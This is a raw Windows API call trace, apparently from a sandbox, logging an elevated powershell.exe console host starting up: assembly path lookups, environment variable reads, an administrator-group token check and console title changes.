	[0703.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0703.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0703.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0707.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1ed3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0707.395] SetErrorMode (uMode=0x1) returned 0x1
	[0707.395] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1ed640 | out: lpFileInformation=0x1ed640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0707.395] SetErrorMode (uMode=0x1) returned 0x1
	[0725.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0725.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0725.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0725.839] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0725.839] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0725.839] CoTaskMemFree (pv=0x41ef10) 
	[0727.490] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0727.490] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0727.491] CoTaskMemFree (pv=0x41ef10) 
	[0727.491] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0727.491] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0727.491] CoTaskMemFree (pv=0x41ef10) 
	[0727.494] CoCreateGuid (in: pguid=0x1eda08 | out: pguid=0x1eda08*(Data1=0x252343ae, Data2=0xf570, Data3=0x4e57, Data4=([0]=0x8a, [1]=0x9d, [2]=0x1b, [3]=0xb7, [4]=0x32, [5]=0x11, [6]=0x8a, [7]=0xef))) returned 0x0
	[0727.497] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0727.497] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0727.498] CoTaskMemFree (pv=0x41ef10) 
	[0727.500] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0727.500] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0727.501] CoTaskMemFree (pv=0x41ef10) 
	[0727.503] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0727.503] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0727.503] CoTaskMemFree (pv=0x41ef10) 
	[0727.518] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0727.520] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1ed6b0 | out: lpConsoleScreenBufferInfo=0x1ed6b0) returned 1
	[0729.270] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0729.272] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1ed6b0 | out: lpConsoleScreenBufferInfo=0x1ed6b0) returned 1
	[0729.273] GetVersionExW (in: lpVersionInformation=0x1ed640*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ed640*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0729.276] GetCurrentProcess () returned 0xffffffffffffffff
	[0729.277] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1ed6d8 | out: TokenHandle=0x1ed6d8*=0x1c0) returned 1
	[0729.281] GetTokenInformation (in: TokenHandle=0x1c0, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ed5f8 | out: TokenInformation=0x0, ReturnLength=0x1ed5f8) returned 0
	[0729.282] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3c7290
	[0729.282] GetTokenInformation (in: TokenHandle=0x1c0, TokenInformationClass=0x8, TokenInformation=0x3c7290, TokenInformationLength=0x4, ReturnLength=0x1ed5f8 | out: TokenInformation=0x3c7290, ReturnLength=0x1ed5f8) returned 1
	[0729.283] DuplicateTokenEx (in: hExistingToken=0x1c0, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1ed758 | out: phNewToken=0x1ed758*=0x304) returned 1
	[0729.283] GetTokenInformation (in: TokenHandle=0x1c0, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ed5f8 | out: TokenInformation=0x0, ReturnLength=0x1ed5f8) returned 0
	[0729.283] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3c72c0
	[0729.284] GetTokenInformation (in: TokenHandle=0x1c0, TokenInformationClass=0x8, TokenInformation=0x3c72c0, TokenInformationLength=0x4, ReturnLength=0x1ed5f8 | out: TokenInformation=0x3c72c0, ReturnLength=0x1ed5f8) returned 1
	[0729.285] CheckTokenMembership (in: TokenHandle=0x304, SidToCheck=0x2d1a0b8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1ed768 | out: IsMember=0x1ed768) returned 1
	[0729.285] CloseHandle (hObject=0x304) returned 1
	[0729.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0729.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0729.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0729.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0731.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0731.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0731.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0731.405] CoTaskMemAlloc (cb=0x804) returned 0x1b88d080
	[0731.405] GetConsoleTitleW (in: lpConsoleTitle=0x1b88d080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0732.860] CoTaskMemFree (pv=0x1b88d080) 
	[0732.888] CoTaskMemAlloc (cb=0x804) returned 0x1b88d930
	[0732.888] GetConsoleTitleW (in: lpConsoleTitle=0x1b88d930, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0732.888] CoTaskMemFree (pv=0x1b88d930) 
	[0732.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0732.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0732.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0732.891] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0736.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0736.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0736.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0736.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0737.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0737.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0737.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0737.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0737.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0737.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0737.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0737.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0737.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0737.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0740.837] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x308
	[0740.839] CoCreateGuid (in: pguid=0x1ed850 | out: pguid=0x1ed850*(Data1=0x2402769d, Data2=0xa4ac, Data3=0x4bc2, Data4=([0]=0xbd, [1]=0x73, [2]=0x47, [3]=0x68, [4]=0x2d, [5]=0xf0, [6]=0xbd, [7]=0x8b))) returned 0x0
	[0740.840] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0740.840] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0740.840] CoTaskMemFree (pv=0x41ef10) 
	[0742.428] WinSqmIsOptedIn () returned 0x0
	[0742.428] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0742.428] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0742.428] CoTaskMemFree (pv=0x41ef10) 
	[0742.432] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0742.432] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0742.432] CoTaskMemFree (pv=0x41ef10) 
	[0742.432] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0742.432] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0742.432] CoTaskMemFree (pv=0x41ef10) 
	[0742.433] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0742.433] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0742.433] CoTaskMemFree (pv=0x41ef10) 
	[0742.434] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0742.434] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0742.434] CoTaskMemFree (pv=0x41ef10) 
	[0742.435] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0742.435] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0742.435] CoTaskMemFree (pv=0x41ef10) 
	[0742.435] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0742.436] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0742.436] CoTaskMemFree (pv=0x41ef10) 
	[0742.436] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0742.436] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0742.436] CoTaskMemFree (pv=0x41ef10) 
	[0742.445] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0742.445] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0742.445] CoTaskMemFree (pv=0x41ef10) 
	[0742.462] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0742.462] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0742.462] CoTaskMemFree (pv=0x41ef10) 
	[0742.463] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0742.463] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0742.463] CoTaskMemFree (pv=0x41ef10) 
	[0742.463] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0742.463] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0742.463] CoTaskMemFree (pv=0x41ef10) 
	[0750.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0750.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0750.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0750.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0750.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
